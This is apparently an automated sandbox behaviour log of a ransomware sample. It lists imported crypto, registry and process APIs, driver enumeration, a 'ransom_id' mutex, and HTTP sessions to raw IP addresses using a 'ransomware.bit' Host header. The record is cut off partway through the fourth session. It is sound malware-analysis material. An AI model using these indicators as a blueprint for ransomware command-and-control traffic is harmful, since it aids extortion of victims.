Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x75af68d0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x75af6720 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75b4ebb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75b4ea10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x75af6820 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x75af6850 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x75af6870 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75af6830 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x75af50d0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x7739b2d0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x7739b250 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75af57f0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75af59c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x75af4ca0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x75af5160 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75af4d10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x75af5ac0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x75af5d10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x77392dc0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x7738f630 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75af53b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x773aa790 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x75af5a60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75b4f500 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x7636db70 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlUnwind, address_out = 0x773b2d30 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x73d6c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75b4ebc0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x75b4eb20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x75b4eb80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x75af6700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x75af6d30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7739d7c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7739b840 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7739b740 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x75af6d70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x7739c0b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7739be10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x773c2b20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x773b8e50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x773b52f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x75af71b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x75af4510 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x75a0d900 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x75af49a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x75af7050 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x75af7760 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x75af7190 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x75af7780 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x75af72c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x75af7440 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x75af7480 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x7599e260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x75af0db0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75b37140 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexW, address_out = 0x75b4eb70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x75b4eed0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerSetConditionMask, address_out = 0x773b48b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x75b4eca0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x75b4dd50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x773aaf20 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x75af5490 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x75af6800 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VerifyVersionInfoW, address_out = 0x75b326c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForMultipleObjects, address_out = 0x75b4ec80 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x75af4a40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x75af4610 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleInformation, address_out = 0x75b4eae0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75b370c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreatePipe, address_out = 0x75af4590 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75b2f750 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x75b2f8f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x75b2edc0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75b4f090 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75b4edf0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75af6bb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x75b2e500 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x75b4ed70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x75b4ee40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileAttributesW, address_out = 0x75b4f100 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x75af5130 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x75b232c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDiskFreeSpaceW, address_out = 0x75b4eeb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetWindowsDirectoryW, address_out = 0x75af5730 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumeInformationW, address_out = 0x75b4f020 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x75af6bd0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiW, address_out = 0x75af6bf0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x75af46b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x75b371a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnmapViewOfFile, address_out = 0x75af68f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MapViewOfFile, address_out = 0x75af5be0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x75b4ef30 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x75af4fb0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75b37060 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75af50b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileMappingW, address_out = 0x75af44b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75af6c50 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x7632ab40 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x76332fb0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x7631f440 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x7632fea0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x763284a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x76328420 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x7631faa0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x73b91c10 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x7636d740 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x763332d0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x7632f900 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x76333ee0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x76328780 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x763107d0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x76324840 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x73b90140 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x76312b80 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetForegroundWindow, address_out = 0x76333420 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharUpperBuffW, address_out = 0x76377670 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowLongW, address_out = 0x73b91ab0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x76447610 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x76e3f440 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x76e3f4f0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76e3ed60 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x76e3fa80 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptExportKey, address_out = 0x76e3f700 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76e3fa40 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetKeyParam, address_out = 0x76e52db0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76e3fbc0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76e3f6a0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76e52cf0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenKey, address_out = 0x76e43430 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyKey, address_out = 0x76e3fa60 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76e3f890 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76e3e5a0 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76e3e580 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76e3f530 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x744342e0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x744312f0 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x74434730 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x76d12d10 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptBinaryToStringA, address_out = 0x76cbc740 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x7399d000 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersW, address_out = 0x73a241c0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestW, address_out = 0x739b9490 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectW, address_out = 0x7399e000 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestW, address_out = 0x73a0bdd0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x739ae9e0 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x739c3a70 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumDeviceDrivers, address_out = 0x75621350 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetDeviceDriverBaseNameW, address_out = 0x756213b0 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x77420cf0 True 21
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGenRandom, address_out = 0x76e40730 True 838
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CheckTokenMembership, address_out = 0x76e3fa00 True 2
Fn
Driver (253)
»
Operation Driver Additional Information Success Count Logfile
Enumerate - load_addresses = 1703688 True 2
Fn
Enumerate - load_addresses = 6815744 True 2
Fn
Get Name - load_address = 2747351040 True 2
Fn
Get Name - load_address = 2756300800 True 2
Fn
Get Name - load_address = 2757754880 True 2
Fn
Get Name - load_address = 1062993920 True 2
Fn
Get Name - load_address = 1063583744 True 2
Fn
Get Name - load_address = 1063976960 True 2
Fn
Get Name - load_address = 1064173568 True 2
Fn
Get Name - load_address = 1064304640 True 2
Fn
Get Name - load_address = 1064763392 True 2
Fn
Get Name - load_address = 1064960000 True 2
Fn
Get Name - load_address = 1065091072 True 2
Fn
Get Name - load_address = 1052770304 True 2
Fn
Get Name - load_address = 1053229056 True 2
Fn
Get Name - load_address = 1054146560 True 2
Fn
Get Name - load_address = 1054212096 True 2
Fn
Get Name - load_address = 1054277632 True 2
Fn
Get Name - load_address = 1054998528 True 2
Fn
Get Name - load_address = 1055719424 True 2
Fn
Get Name - load_address = 1056636928 True 2
Fn
Get Name - load_address = 1056768000 True 2
Fn
Get Name - load_address = 1056833536 True 2
Fn
Get Name - load_address = 1057030144 True 2
Fn
Get Name - load_address = 1057095680 True 2
Fn
Get Name - load_address = 1057882112 True 2
Fn
Get Name - load_address = 1057947648 True 2
Fn
Get Name - load_address = 1058078720 True 2
Fn
Get Name - load_address = 1058209792 True 2
Fn
Get Name - load_address = 1058275328 True 2
Fn
Get Name - load_address = 1058406400 True 2
Fn
Get Name - load_address = 1058471936 True 2
Fn
Get Name - load_address = 1058865152 True 2
Fn
Get Name - load_address = 1058996224 True 2
Fn
Get Name - load_address = 1059192832 True 2
Fn
Get Name - load_address = 1059323904 True 2
Fn
Get Name - load_address = 1059520512 True 2
Fn
Get Name - load_address = 1060175872 True 2
Fn
Get Name - load_address = 1060306944 True 2
Fn
Get Name - load_address = 1060700160 True 2
Fn
Get Name - load_address = 1060831232 True 2
Fn
Get Name - load_address = 1061027840 True 2
Fn
Get Name - load_address = 1061617664 True 2
Fn
Get Name - load_address = 1061748736 True 2
Fn
Get Name - load_address = 1061879808 True 2
Fn
Get Name - load_address = 1077411840 True 2
Fn
Get Name - load_address = 1079836672 True 2
Fn
Get Name - load_address = 1065353216 True 2
Fn
Get Name - load_address = 1066663936 True 2
Fn
Get Name - load_address = 1067253760 True 2
Fn
Get Name - load_address = 1067450368 True 2
Fn
Get Name - load_address = 1070202880 True 2
Fn
Get Name - load_address = 1070661632 True 2
Fn
Get Name - load_address = 1070858240 True 2
Fn
Get Name - load_address = 1071644672 True 2
Fn
Get Name - load_address = 1071710208 True 2
Fn
Get Name - load_address = 1072168960 True 2
Fn
Get Name - load_address = 1072496640 True 2
Fn
Get Name - load_address = 1072693248 True 2
Fn
Get Name - load_address = 1072889856 True 2
Fn
Get Name - load_address = 1073020928 True 2
Fn
Get Name - load_address = 1073610752 True 2
Fn
Get Name - load_address = 1074528256 True 2
Fn
Get Name - load_address = 1074724864 True 2
Fn
Get Name - load_address = 1074855936 True 2
Fn
Get Name - load_address = 1074921472 True 2
Fn
Get Name - load_address = 1074987008 True 2
Fn
Get Name - load_address = 1075052544 True 2
Fn
Get Name - load_address = 1075183616 True 2
Fn
Get Name - load_address = 1092354048 True 2
Fn
Get Name - load_address = 1094844416 True 2
Fn
Get Name - load_address = 1094975488 True 2
Fn
Get Name - load_address = 1095041024 True 2
Fn
Get Name - load_address = 1095172096 True 2
Fn
Get Name - load_address = 1095237632 True 2
Fn
Get Name - load_address = 1095434240 True 2
Fn
Get Name - load_address = 1095499776 True 2
Fn
Get Name - load_address = 1095892992 True 2
Fn
Get Name - load_address = 1096548352 True 2
Fn
Get Name - load_address = 1086324736 True 2
Fn
Get Name - load_address = 1086521344 True 2
Fn
Get Name - load_address = 1086652416 True 2
Fn
Get Name - load_address = 1087176704 True 2
Fn
Get Name - load_address = 1087766528 True 2
Fn
Get Name - load_address = 1087897600 True 2
Fn
Get Name - load_address = 1087963136 True 2
Fn
Get Name - load_address = 1088028672 True 2
Fn
Get Name - load_address = 1088094208 True 2
Fn
Get Name - load_address = 1088421888 True 2
Fn
Get Name - load_address = 1088749568 True 2
Fn
Get Name - load_address = 1088880640 True 2
Fn
Get Name - load_address = 1088946176 True 2
Fn
Get Name - load_address = 1089077248 True 2
Fn
Get Name - load_address = 1089208320 True 2
Fn
Get Name - load_address = 1089667072 True 2
Fn
Get Name - load_address = 1089863680 True 2
Fn
Get Name - load_address = 1090322432 True 2
Fn
Get Name - load_address = 1090453504 True 2
Fn
Get Name - load_address = 1090977792 True 2
Fn
Get Name - load_address = 1091567616 True 2
Fn
Get Name - load_address = 1091829760 True 2
Fn
Get Name - load_address = 1091895296 True 2
Fn
Get Name - load_address = 1091960832 True 2
Fn
Get Name - load_address = 1075314688 True 2
Fn
Get Name - load_address = 1092026368 True 2
Fn
Get Name - load_address = 1075904512 True 2
Fn
Get Name - load_address = 1092091904 True 2
Fn
Get Name - load_address = 1092157440 True 2
Fn
Get Name - load_address = 1076363264 True 1
Fn
Get Name - load_address = 1096679424 True 1
Fn
Get Name - load_address = 1088290816 True 1
Fn
Get Name - load_address = 1076625408 True 1
Fn
Get Name - load_address = 1088356352 True 1
Fn
Get Name - load_address = 1076756480 True 1
Fn
Get Name - load_address = 1076887552 True 1
Fn
Get Name - load_address = 1077149696 True 1
Fn
Get Name - load_address = 1073741824 True 1
Fn
Get Name - load_address = 285147136 True 1
Fn
Get Name - load_address = 268435456 True 1
Fn
Get Name - load_address = 272236544 True 1
Fn
Get Name - load_address = 1073872896 True 1
Fn
Get Name - load_address = 1062141952 True 1
Fn
Get Name - load_address = 274399232 True 1
Fn
Get Name - load_address = 274464768 True 1
Fn
Get Name - load_address = 1074003968 True 1
Fn
Get Name - load_address = 1074200576 True 1
Fn
Get Name - load_address = 1074397184 True 1
Fn
Get Name - load_address = 1077346304 True 1
Fn
Get Name - load_address = 1065156608 True 1
Fn
Get Name - load_address = 2743926784 True 1
Fn
Get Name - load_address = 2744057856 True 1
Fn
Get Name - load_address = 2734686208 True 1
Fn
Get Name - load_address = 2735865856 True 1
Fn
Get Name - load_address = 2736062464 True 1
Fn
Get Name - load_address = 2736586752 True 1
Fn
Get Name - load_address = 2736848896 True 1
Fn
Get Name - load_address = 2736979968 True 1
Fn
Get Name - load_address = 2737111040 True 1
Fn
Get Name - load_address = 2737438720 True 1
Fn
Get Name - load_address = 2738225152 True 1
Fn
Get Name - load_address = 2738552832 True 1
Fn
Get Name - load_address = 2738749440 True 1
Fn
Get Name - load_address = 2739601408 True 1
Fn
Get Name - load_address = 2740191232 True 1
Fn
Get Name - load_address = 2740322304 True 1
Fn
System (49)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = NQDPDE True 8
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Sleep duration = 10001 milliseconds (10.001 seconds) True 7
Fn
Sleep duration = -1 (infinite) True 1
Fn
Get Time type = System Time, time = 2018-04-20 16:22:51 (UTC) True 1
Fn
Get Time type = Ticks, time = 56671 True 1
Fn
Get Time type = Ticks, time = 91656 True 1
Fn
Get Time type = Ticks, time = 105312 True 1
Fn
Get Time type = Ticks, time = 139953 True 1
Fn
Get Time type = Ticks, time = 153312 True 1
Fn
Get Time type = Ticks, time = 166593 True 1
Fn
Get Time type = Ticks, time = 182531 True 1
Fn
Get Time type = Ticks, time = 195812 True 1
Fn
Get Time type = Ticks, time = 203703 True 1
Fn
Get Time type = Ticks, time = 220546 True 2
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Windows Directory, result_out = C:\WINDOWS True 11
Fn
Get Info type = Hardware Information True 8
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=bdc31ed2b4197730 True 1
Fn
Environment (3)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Get Environment String name = AppData, result_out = C:\Users\FD1HVy\AppData\Roaming True 1
Fn
Network Behavior
HTTP Sessions (17)
»
Information Value
Total Data Sent 4.81 KB
Total Data Received 656 bytes
Contacted Host Count 6
Contacted Hosts ipv4bot.whatismyipaddress.com, 190.140.194.176, 193.33.1.19, 84.54.187.24, 85.187.48.16, 217.75.83.218
HTTP Session #1
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 13
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 13 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 34
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 190.140.194.176
Server Port 80
Data Sent 294
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 190.140.194.176, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = steistay?auphei=ee&ay=ores, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 190.140.194.176/steistay?auphei=ee&ay=ores False 1
Fn
Close Session - True 34
Fn
HTTP Session #3
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name ipv4bot.whatismyipaddress.com
Server Port 80
Data Sent 295
Data Received 13
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Add HTTP Request Headers headers = Host: ransomware.bit True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Read Response size = 10238, size_out = 13 True 1
Fn
Data
Read Response size = 10238, size_out = 0 True 1
Fn
Close Session - True 34
Fn
HTTP Session #4
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Server Name 193.33.1.19
Server Port 80
Data Sent 287
Data Received 0
Operation Additional Information Success Count Logfile
